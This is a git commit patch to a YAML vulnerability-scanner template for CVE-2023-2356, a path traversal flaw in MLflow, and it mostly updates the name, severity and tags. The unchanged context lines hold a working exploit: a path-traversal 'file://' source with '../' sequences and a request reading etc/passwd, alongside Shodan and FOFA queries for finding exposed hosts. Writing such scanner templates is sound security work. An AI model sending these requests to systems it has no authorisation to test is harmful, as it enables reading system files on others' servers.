From 717a7410d94dddef3f6d7c07ad1a39037c2c26b3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 23 May 2023 12:02:34 +0530
Subject: [PATCH] severity & name -updated

---
 http/cves/2023/CVE-2023-2356.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml
index b546ed3b5b..8938fb957c 100644
--- a/http/cves/2023/CVE-2023-2356.yaml
+++ b/http/cves/2023/CVE-2023-2356.yaml
@@ -1,9 +1,9 @@
 id: CVE-2023-2356
 
 info:
-  name: Mlflow 5.2.5 - Local File Inclusion
+  name: Mlflow <2.3.0 - Local File Inclusion
   author: Co5mos
-  severity: critical
+  severity: high
   description: |
     Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
   reference:
@@ -15,10 +15,10 @@ info:
     cve-id: CVE-2023-2356
     cwe-id: CWE-23
   metadata:
+    verified: "true"
     shodan-query: http.title:"mlflow"
     fofa-query: app="MLflow"
-    verified: "true"
-  tags: cve,cve2023,lfi,huntr,mlflow
+  tags: cve,cve2023,lfi,huntr,mlflow,oss
 
 variables:
   str: "{{rand_base(6)}}"
@@ -37,7 +37,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"name": "{{str}}", "source":  "file://{{Hostname}}/../../../../../../../"}
+        {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
 
       - |
         GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1